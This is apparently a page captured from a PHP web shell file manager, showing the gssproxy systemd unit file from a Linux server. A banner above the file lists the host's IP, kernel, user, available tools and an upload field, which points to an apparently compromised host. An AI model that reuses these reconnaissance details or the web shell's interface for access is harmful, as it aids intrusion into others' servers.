| Server IP : 3.96.16.70 / Your IP : 216.73.216.15 Web Server : Apache System : Linux ip-172-31-26-103.ca-central-1.compute.internal 6.1.163-186.299.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Feb 24 16:35:42 UTC 2026 x86_64 User : ec2-user ( 1000) PHP Version : 8.4.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /lib/systemd/system/ |
Upload File : |
[Unit] Description=GSSAPI Proxy Daemon # GSSPROXY will not be started until syslog is After=syslog.target network.target Before=rpc-gssd.service [Service] StateDirectory=gssproxy/clients gssproxy/rcache StateDirectoryMode=0700 Environment=KRB5RCACHEDIR=/var/lib/gssproxy/rcache ExecStart=/usr/sbin/gssproxy -D # These two should be used with traditional UNIX forking daemons # consult systemd.service(5) for more details Type=forking PIDFile=/run/gssproxy.pid ExecReload=/bin/kill -HUP $MAINPID ProtectSystem=full ProtectClock=true ProtectKernelLogs=true ProtectControlGroups=true RestrictRealtime=true # NoNewPrivileges: when true breaks the ability to open a socket # under /var/lib/gssproxy so no NoNewPrivileges # PrivateTmp: can't be used as it hides ccaches stored in /tmp # ProtectHome: blocks access to /home which may hold ccaches # ProtectHostname: blocks propagation of hostname on change # but in some cases, when using a keytab, we may want to see hostname # changes as the server will want to respond only for the system name # ProtectKernelTunables: blocks ability to write to proc. # on startup gssproxy needs to write in proc to let nfsd know it can # use the "new" gssproxy method instead of the old rpc stuff. [Install] WantedBy=multi-user.target